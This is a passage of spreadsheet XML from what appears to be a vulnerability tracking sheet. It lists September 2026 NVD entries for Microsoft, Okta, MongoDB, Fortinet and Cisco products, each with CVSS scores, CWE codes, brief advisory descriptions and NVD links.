          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K264" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78523</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78574</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>The Okta Hyperdrive Integration plugin resolves a required assembly using a registry path within the current user's hive without integrity verification. The referenced path is loaded via Assembly.LoadFrom without signature validation, resulting in an unverified assembly executing within the context of the host process or elevated installer.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83989</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K26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67" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84001</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K26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68" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78627</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>The Okta Hyperdrive Integration installer does not mask the OAuth client secret when passed as an MSI property. The credential is recorded in plaintext in the installer log, the Application Event Log, and the process command line, all of which are readable by an authenticated local user on the workstation.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue exists in the server's query execution memory tracking subsystem. An authenticated user with read privileges can trigger a write to freed heap memory through a sequence of standard database commands, leading to server process crash or potential memory corruption. No user interaction is required.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K271" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of storage engine configuration options in MongoDB Server allows an authenticated user with write privileges to supply crafted parameters during collection creation that override internal storage metadata. This results in an out-of-bounds memory write in the server process, causing a denial of service via server crash, with potential for further impact including arbitrary code execution.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84387</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Unified Extensible Firmware Interface (UEFI) Shell implementation of Cisco UCS Servers and UCS-based appliances could allow an authenticated attacker with valid credentials for a user account with the role of user or admin&amp;nbsp;or an unauthenticated attacker with physical access to an affected device to bypass UEFI Secure Boot validation checks and execute unauthorized software.
This vulnerability is due to the availability of memory write commands in the UEFI Shell while UEFI Secure Boot is enabled on a device. An attacker could exploit this vulnerability by selecting the UEFI Shell boot option at boot time and using available shell commands to modify UEFI memory variables. A successful exploit could allow the attacker to manipulate the preboot environment, overwrite UEFI Secure Boot-related memory values, and execute unauthorized software on the affected device.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68835</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K27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4" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K27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5" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68893</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69314</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K27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77" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69340</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K27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8" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69366</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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79" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
